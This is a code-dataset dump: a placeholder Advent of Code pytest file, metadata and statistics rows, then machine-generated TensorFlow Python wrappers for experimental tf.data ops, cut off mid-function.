"MIT"
] | null | null | null |
import pytest
from .context import advent_of_code_2020
# from advent_of_code_2020.dayDD import *
def test_something():
    """Placeholder test; replace once the day's puzzle solution exists."""
| 18.428571
| 41
| 0.79845
| 20
| 129
| 4.8
| 0.65
| 0.166667
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 0.147287
| 129
| 6
| 42
| 21.5
| 0.8
| 0.302326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
18358b39e1f78d47e6c2f248f24645c1031583d9
| 294,269
|
py
|
Python
|
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/python/ops/gen_experimental_dataset_ops.py
|
foodwaze0/webapp
|
897043cbbfdbad8d6c54f0556f31e4127d518fc1
|
[
"bzip2-1.0.6"
] | null | null | null |
"""Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def choose_fastest_branch_dataset(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None):
  r"""Generated wrapper for the `ChooseFastestBranchDataset` op.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    ratio_numerator: A `Tensor` of type `int64`.
    ratio_denominator: A `Tensor` of type `int64`.
    other_arguments: A list of `Tensor` objects.
    num_elements_per_branch: An `int` that is `>= 1`.
    branches: A list of functions decorated with @Defun that has length `>= 1`.
    other_arguments_lengths: A list of `ints` that has length `>= 1`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: attempt the C fast-path first; on FallbackException retry
    # via the slower eager fallback; on a not-OK status re-raise with the
    # op name appended to the message.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ChooseFastestBranchDataset", name, _ctx._post_execution_callbacks,
          input_dataset, ratio_numerator, ratio_denominator, other_arguments,
          "num_elements_per_branch", num_elements_per_branch, "branches",
          branches, "other_arguments_lengths", other_arguments_lengths,
          "output_types", output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        return choose_fastest_branch_dataset_eager_fallback(
            input_dataset, ratio_numerator, ratio_denominator,
            other_arguments, num_elements_per_branch=num_elements_per_branch,
            branches=branches,
            other_arguments_lengths=other_arguments_lengths,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate/canonicalize every attr, then build the op node.
  num_elements_per_branch = _execute.make_int(num_elements_per_branch, "num_elements_per_branch")
  if not isinstance(branches, (list, tuple)):
    raise TypeError(
        "Expected list for 'branches' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % branches)
  if not isinstance(other_arguments_lengths, (list, tuple)):
    raise TypeError(
        "Expected list for 'other_arguments_lengths' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % other_arguments_lengths)
  other_arguments_lengths = [_execute.make_int(_i, "other_arguments_lengths") for _i in other_arguments_lengths]
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ChooseFastestBranchDataset", input_dataset=input_dataset,
                                      ratio_numerator=ratio_numerator,
                                      ratio_denominator=ratio_denominator,
                                      other_arguments=other_arguments,
                                      num_elements_per_branch=num_elements_per_branch,
                                      branches=branches,
                                      other_arguments_lengths=other_arguments_lengths,
                                      output_types=output_types,
                                      output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Attrs are read back from the created op so gradients see final values.
  _attrs = ("Targuments", _op.get_attr("Targuments"),
            "num_elements_per_branch",
            _op.get_attr("num_elements_per_branch"), "branches",
            _op.get_attr("branches"), "other_arguments_lengths",
            _op.get_attr("other_arguments_lengths"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ChooseFastestBranchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ChooseFastestBranchDataset(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None):
  # Thin alias that forwards every argument to the snake_case wrapper.
  return choose_fastest_branch_dataset(input_dataset=input_dataset, ratio_numerator=ratio_numerator, ratio_denominator=ratio_denominator, other_arguments=other_arguments, num_elements_per_branch=num_elements_per_branch, branches=branches, other_arguments_lengths=other_arguments_lengths, output_types=output_types, output_shapes=output_shapes, name=name)
ChooseFastestBranchDataset.__doc__ = choose_fastest_branch_dataset.__doc__
# Hide the alias from generated docs, wrap it (presumably keyword-only per
# _kwarg_only's name) and export it under tf.raw_ops.
ChooseFastestBranchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ChooseFastestBranchDataset))
tf_export("raw_ops.ChooseFastestBranchDataset")(ChooseFastestBranchDataset)
def choose_fastest_branch_dataset_eager_fallback(input_dataset, ratio_numerator, ratio_denominator, other_arguments, num_elements_per_branch, branches, other_arguments_lengths, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function choose_fastest_branch_dataset
  """
  _ctx = ctx if ctx else _context.context()
  # Validate/canonicalize attrs exactly as the graph path does.
  num_elements_per_branch = _execute.make_int(num_elements_per_branch, "num_elements_per_branch")
  if not isinstance(branches, (list, tuple)):
    raise TypeError(
        "Expected list for 'branches' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % branches)
  if not isinstance(other_arguments_lengths, (list, tuple)):
    raise TypeError(
        "Expected list for 'other_arguments_lengths' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % other_arguments_lengths)
  other_arguments_lengths = [_execute.make_int(_i, "other_arguments_lengths") for _i in other_arguments_lengths]
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'choose_fastest_branch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert inputs to eager tensors; other_arguments may be of mixed dtypes
  # and yields the Targuments attr.
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  ratio_numerator = _ops.convert_to_tensor(ratio_numerator, _dtypes.int64)
  ratio_denominator = _ops.convert_to_tensor(ratio_denominator, _dtypes.int64)
  _inputs_flat = [input_dataset, ratio_numerator, ratio_denominator] + list(other_arguments)
  _attrs = ("Targuments", _attr_Targuments, "num_elements_per_branch",
  num_elements_per_branch, "branches", branches, "other_arguments_lengths",
  other_arguments_lengths, "output_types", output_types, "output_shapes",
  output_shapes)
  _result = _execute.execute(b"ChooseFastestBranchDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ChooseFastestBranchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_assert_next_dataset(input_dataset, transformations, output_types, output_shapes, name=None):
  r"""Generated wrapper for the `ExperimentalAssertNextDataset` op.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    transformations: A `Tensor` of type `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: C fast-path first, then the eager fallback, re-raising
    # not-OK statuses with the op name appended.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalAssertNextDataset", name, _ctx._post_execution_callbacks,
          input_dataset, transformations, "output_types", output_types,
          "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        return experimental_assert_next_dataset_eager_fallback(
            input_dataset, transformations, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate attrs, then build the op node.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_assert_next_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_assert_next_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalAssertNextDataset", input_dataset=input_dataset,
                                         transformations=transformations,
                                         output_types=output_types,
                                         output_shapes=output_shapes,
                                         name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalAssertNextDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalAssertNextDataset(input_dataset, transformations, output_types, output_shapes, name=None):
  # Thin alias that forwards every argument to the snake_case wrapper.
  return experimental_assert_next_dataset(input_dataset=input_dataset, transformations=transformations, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalAssertNextDataset.__doc__ = experimental_assert_next_dataset.__doc__
# Hide the alias from generated docs, wrap it (presumably keyword-only per
# _kwarg_only's name) and export it under tf.raw_ops.
ExperimentalAssertNextDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalAssertNextDataset))
tf_export("raw_ops.ExperimentalAssertNextDataset")(ExperimentalAssertNextDataset)
def experimental_assert_next_dataset_eager_fallback(input_dataset, transformations, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_assert_next_dataset
  """
  _ctx = ctx if ctx else _context.context()
  # Validate/canonicalize attrs exactly as the graph path does.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_assert_next_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_assert_next_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert inputs to eager tensors of the op's fixed dtypes.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  transformations = _ops.convert_to_tensor(transformations, _dtypes.string)
  _inputs_flat = [input_dataset, transformations]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalAssertNextDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalAssertNextDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_auto_shard_dataset(input_dataset, num_workers, index, output_types, output_shapes, name=None):
  r"""Creates a dataset that shards the input dataset.

  Creates a dataset that shards the input dataset by num_workers, returning a
  sharded dataset for the index-th worker. This attempts to automatically shard
  a dataset by examining the Dataset graph and inserting a shard op before the
  inputs to a reader Dataset (e.g. CSVDataset, TFRecordDataset).

  This dataset will throw a NotFound error if we cannot shard the dataset
  automatically.

  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    num_workers: A `Tensor` of type `int64`.
      A scalar representing the number of workers to distribute this dataset across.
    index: A `Tensor` of type `int64`.
      A scalar representing the index of the current worker out of num_workers.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: C fast-path first, then the eager fallback, re-raising
    # not-OK statuses with the op name appended.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalAutoShardDataset", name, _ctx._post_execution_callbacks,
          input_dataset, num_workers, index, "output_types", output_types,
          "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      try:
        return experimental_auto_shard_dataset_eager_fallback(
            input_dataset, num_workers, index, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: validate attrs, then build the op node.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_auto_shard_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_auto_shard_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalAutoShardDataset", input_dataset=input_dataset,
                                        num_workers=num_workers, index=index,
                                        output_types=output_types,
                                        output_shapes=output_shapes,
                                        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalAutoShardDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalAutoShardDataset(input_dataset, num_workers, index, output_types, output_shapes, name=None):
  # Thin alias that forwards every argument to the snake_case wrapper.
  return experimental_auto_shard_dataset(input_dataset=input_dataset, num_workers=num_workers, index=index, output_types=output_types, output_shapes=output_shapes, name=name)
ExperimentalAutoShardDataset.__doc__ = experimental_auto_shard_dataset.__doc__
# Hide the alias from generated docs, wrap it (presumably keyword-only per
# _kwarg_only's name) and export it under tf.raw_ops.
ExperimentalAutoShardDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalAutoShardDataset))
tf_export("raw_ops.ExperimentalAutoShardDataset")(ExperimentalAutoShardDataset)
def experimental_auto_shard_dataset_eager_fallback(input_dataset, num_workers, index, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_auto_shard_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate and canonicalize the attribute lists.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_auto_shard_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_auto_shard_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # Coerce each input to the dtype declared by the op definition.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  num_workers = _ops.convert_to_tensor(num_workers, _dtypes.int64)
  index = _ops.convert_to_tensor(index, _dtypes.int64)
  _inputs_flat = [input_dataset, num_workers, index]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalAutoShardDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalAutoShardDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_bytes_produced_stats_dataset(input_dataset, tag, output_types, output_shapes, name=None):
  r"""Records the bytes size of each element of `input_dataset` in a StatsAggregator.
  Args:
    input_dataset: A `Tensor` of type `variant`.
    tag: A `Tensor` of type `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalBytesProducedStatsDataset", name,
        _ctx._post_execution_callbacks, input_dataset, tag, "output_types",
        output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_bytes_produced_stats_dataset_eager_fallback(
            input_dataset, tag, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode (or symbolic fallthrough): validate attrs, then build the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_bytes_produced_stats_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_bytes_produced_stats_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalBytesProducedStatsDataset", input_dataset=input_dataset,
                                                 tag=tag,
                                                 output_types=output_types,
                                                 output_shapes=output_shapes,
                                                 name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalBytesProducedStatsDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalBytesProducedStatsDataset(input_dataset, tag, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_bytes_produced_stats_dataset(
      input_dataset, tag, output_types, output_shapes, name=name)
ExperimentalBytesProducedStatsDataset.__doc__ = experimental_bytes_produced_stats_dataset.__doc__
ExperimentalBytesProducedStatsDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalBytesProducedStatsDataset))
tf_export("raw_ops.ExperimentalBytesProducedStatsDataset")(ExperimentalBytesProducedStatsDataset)
def experimental_bytes_produced_stats_dataset_eager_fallback(input_dataset, tag, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_bytes_produced_stats_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate and canonicalize the attribute lists.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_bytes_produced_stats_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_dt, "output_types")
                  for _dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_bytes_produced_stats_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # Coerce each input to the dtype declared by the op definition.
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  tag = _ops.convert_to_tensor(tag, _dtypes.string)
  _inputs_flat = [input_dataset, tag]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalBytesProducedStatsDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalBytesProducedStatsDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_csv_dataset(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None):
  r"""TODO: add doc.
  Args:
    filenames: A `Tensor` of type `string`.
    compression_type: A `Tensor` of type `string`.
    buffer_size: A `Tensor` of type `int64`.
    header: A `Tensor` of type `bool`.
    field_delim: A `Tensor` of type `string`.
    use_quote_delim: A `Tensor` of type `bool`.
    na_value: A `Tensor` of type `string`.
    select_cols: A `Tensor` of type `int64`.
    record_defaults: A list of `Tensor` objects with types from: `float32`, `float64`, `int32`, `int64`, `string`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalCSVDataset", name, _ctx._post_execution_callbacks,
        filenames, compression_type, buffer_size, header, field_delim,
        use_quote_delim, na_value, select_cols, record_defaults,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_csv_dataset_eager_fallback(
            filenames, compression_type, buffer_size, header, field_delim,
            use_quote_delim, na_value, select_cols, record_defaults,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Graph mode: note there is no output_types argument here — the op helper
  # infers the output_types attr from the dtypes of record_defaults.
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_csv_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalCSVDataset", filenames=filenames,
                                  compression_type=compression_type,
                                  buffer_size=buffer_size, header=header,
                                  field_delim=field_delim,
                                  use_quote_delim=use_quote_delim,
                                  na_value=na_value, select_cols=select_cols,
                                  record_defaults=record_defaults,
                                  output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalCSVDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalCSVDataset(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None):
  # Raw-op alias: forward every argument straight to the snake_case wrapper.
  return experimental_csv_dataset(
      filenames, compression_type, buffer_size, header, field_delim,
      use_quote_delim, na_value, select_cols, record_defaults, output_shapes,
      name=name)
ExperimentalCSVDataset.__doc__ = experimental_csv_dataset.__doc__
ExperimentalCSVDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalCSVDataset))
tf_export("raw_ops.ExperimentalCSVDataset")(ExperimentalCSVDataset)
def experimental_csv_dataset_eager_fallback(filenames, compression_type, buffer_size, header, field_delim, use_quote_delim, na_value, select_cols, record_defaults, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.
  This is for function experimental_csv_dataset
  """
  # Use the caller-supplied context when given, else the global eager context.
  _ctx = ctx or _context.context()
  # Validate and canonicalize the shapes attribute.
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_csv_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_shape, "output_shapes")
                   for _shape in output_shapes]
  # The output_types attr is inferred from the dtypes of record_defaults.
  _attr_output_types, record_defaults = _execute.convert_to_mixed_eager_tensors(record_defaults, _ctx)
  # Coerce the remaining inputs to the dtypes declared by the op definition.
  filenames = _ops.convert_to_tensor(filenames, _dtypes.string)
  compression_type = _ops.convert_to_tensor(compression_type, _dtypes.string)
  buffer_size = _ops.convert_to_tensor(buffer_size, _dtypes.int64)
  header = _ops.convert_to_tensor(header, _dtypes.bool)
  field_delim = _ops.convert_to_tensor(field_delim, _dtypes.string)
  use_quote_delim = _ops.convert_to_tensor(use_quote_delim, _dtypes.bool)
  na_value = _ops.convert_to_tensor(na_value, _dtypes.string)
  select_cols = _ops.convert_to_tensor(select_cols, _dtypes.int64)
  _inputs_flat = [filenames, compression_type, buffer_size, header,
                  field_delim, use_quote_delim, na_value,
                  select_cols] + list(record_defaults)
  _attrs = ("output_types", _attr_output_types, "output_shapes",
            output_shapes)
  # Execute eagerly (one output) and register the op for gradients.
  _result = _execute.execute(b"ExperimentalCSVDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalCSVDataset", _inputs_flat, _attrs, _result, name)
  (_result,) = _result
  return _result
def experimental_choose_fastest_dataset(input_datasets, num_experiments, output_types, output_shapes, name=None):
  r"""TODO: add doc.
  Args:
    input_datasets: A list of at least 2 `Tensor` objects with type `variant`.
    num_experiments: An `int`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C-level fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalChooseFastestDataset", name,
        _ctx._post_execution_callbacks, input_datasets, "num_experiments",
        num_experiments, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the slow eager path.
      try:
        return experimental_choose_fastest_dataset_eager_fallback(
            input_datasets, num_experiments=num_experiments,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Surface the C++ status as a Python exception, appending the op name.
      if name is not None:
        message = e.message + " name: " + name
